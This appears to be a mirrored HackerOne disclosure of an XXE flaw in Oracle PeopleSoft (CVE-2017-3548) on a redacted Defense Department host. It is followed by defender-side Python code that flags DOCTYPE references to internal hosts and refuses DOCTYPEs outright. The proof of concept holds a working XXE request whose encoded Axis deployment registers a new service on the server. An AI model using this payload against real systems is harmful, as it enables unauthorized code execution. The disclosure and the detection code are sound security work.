hackerone / sp1d3rs / H1:710654
History: Oct 09, 2019 - 6:41 p.m.

U.S. Dept Of Defense: XXE with RCE potential on the https://█████████ (CVE-2017-3548)

2019-10-09 18:41:26
sp1d3rs
hackerone.com
10

CVSS2

6.4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:N/A:P

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

LOW

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

AI Score

6.4

Confidence

Low

## Description
Hello. I was able to identify XXE on the https://███████
It is a CVE in Oracle PeopleSoft (CVE-2017-3548).

## POC
I determined that the instance is available on localhost port 80, so it’s possible to access /pspc/services/AdminService via XXE:

```http
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: ████████
Content-Type: application/xml
Content-Length: 608

<!DOCTYPE a PUBLIC "-//B/A/EN" "http://localhost:80/pspc/services/AdminService?method=%21--%3E%3Cns1%3Adeployment+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Cns1%3Aservice+name%3D%22h1testservice%22+provider%3D%22java%3ARPC%22%3E%3Cns1%3Aparameter+name%3D%22className%22+value%3D%22org.apache.pluto.portalImpl.Deploy%22%2F%3E%3Cns1%3Aparameter+name%3D%22allowedMethods%22+value%3D%22%2A%22%2F%3E%3C%2Fns1%3Aservice%3E%3C%2Fns1%3Adeployment">
```

where h1testservice is the test service name I’m trying to create.

The result:

https://██████████/pspc/services/h1testservice

█████
I created a new service on the server.

It’s possible to go further like the other researcher did in #227880, but I don’t think that dropping a shell is necessary (since it’s already proved that we can create our Apache Axis service).

## Suggested fix
Patch Oracle PeopleSoft instance.

## Impact

Remote code execution, internal network access.
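As a defender-side addition (not part of sp1d3rs's report and not Oracle or Apache Axis code), the following Python shows two checks for the request shape in the POC above: an inspector that pulls the DOCTYPE external identifier out of an XML body and flags URIs aimed at loopback, private address space or the local filesystem, and a parse gate that refuses any DOCTYPE declaration outright, the same posture as the Xerces `disallow-doctype-decl` feature on the Java side. The sample body is constructed to mirror the report's request with a placeholder instead of the encoded `method` parameter; the function names, the `DoctypeFinding` structure and `DoctypeRejected` are mine, not library types.

```python
"""Defender-side checks for XML bodies carrying an external DOCTYPE reference.

inspect_doctype() extracts the DOCTYPE external identifier (SYSTEM or PUBLIC URI)
and reports whether it points at the server itself, the shape of the
XXE-to-localhost request in the report above.
parse_without_doctype() is a hard gate: expat aborts the parse as soon as any
DOCTYPE declaration appears (cf. Xerces' disallow-doctype-decl).
"""
import ipaddress
import re
import urllib.parse
import xml.parsers.expat
from dataclasses import dataclass
from typing import List, Optional

# <!DOCTYPE name SYSTEM "uri"> or <!DOCTYPE name PUBLIC "pubid" "uri">, either
# quote style; a bare <!DOCTYPE name> (e.g. HTML5) also matches, with no URI.
_DOCTYPE_RE = re.compile(
    r"<!DOCTYPE\s+(?P<name>[^\s\[>]+)"
    r"(?:\s+(?:SYSTEM\s+(?P<sys>\"[^\"]*\"|'[^']*')"
    r"|PUBLIC\s+(?:\"[^\"]*\"|'[^']*')\s+(?P<pub>\"[^\"]*\"|'[^']*')))?",
    re.IGNORECASE,
)


@dataclass
class DoctypeFinding:           # hypothetical structure, not a library type
    root_name: str
    external_id: Optional[str]  # the SYSTEM/PUBLIC URI, None for a bare DOCTYPE
    host: Optional[str]
    local_target: bool          # file: URI, or host is loopback/private/link-local


def _is_internal_host(host: str) -> bool:
    """True for 'localhost' and for loopback/private/link-local IP literals."""
    if host.lower() in ("localhost", "localhost.localdomain"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # public hostname; DNS resolution/rebinding is out of scope here
    return ip.is_loopback or ip.is_private or ip.is_link_local


def inspect_doctype(body: str) -> Optional[DoctypeFinding]:
    """Return a finding for the first DOCTYPE in body, or None if there is none."""
    m = _DOCTYPE_RE.search(body)
    if m is None:
        return None
    raw = m.group("sys") or m.group("pub")
    uri = raw[1:-1] if raw else None  # strip the surrounding quotes
    host = None
    local = False
    if uri:
        split = urllib.parse.urlsplit(uri)
        host = split.hostname  # None for file:/// or a relative reference
        local = split.scheme.lower() == "file" or (bool(host) and _is_internal_host(host))
    return DoctypeFinding(m.group("name"), uri, host, local)


class DoctypeRejected(ValueError):
    """Raised by the gate when the document declares a DOCTYPE."""


def parse_without_doctype(body: bytes) -> List[str]:
    """Parse body with expat, refusing any DOCTYPE; returns element names seen."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # An exception raised inside an expat handler propagates out of Parse().
        raise DoctypeRejected(f"DOCTYPE {name!r} (system id {system_id!r}) refused")

    seen: List[str] = []
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(body, True)
    return seen


# Constructed sample in the shape of the report's POC; the method parameter is a
# placeholder, not the encoded deployment descriptor from the report.
SAMPLE_POC_BODY = (
    '<!DOCTYPE a PUBLIC "-//B/A/EN" '
    '"http://localhost:80/pspc/services/AdminService?method=PLACEHOLDER">'
)

if __name__ == "__main__":
    print(inspect_doctype(SAMPLE_POC_BODY))
    try:
        parse_without_doctype(SAMPLE_POC_BODY.encode())
    except DoctypeRejected as exc:
        print("gate:", exc)
```

The inspector is a triage aid for request logs or a WAF rule: it tells you which DOCTYPE URIs were aimed at the host itself. It is not the control, because a `file:` URI has no host and an attacker-controlled public hostname can still resolve to an internal address; the gate, which refuses every DOCTYPE before any entity or external identifier is acted on, is what actually closes the class, and on the PeopleSoft side that is what the vendor patch for CVE-2017-3548 has to achieve in the Java parser configuration.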
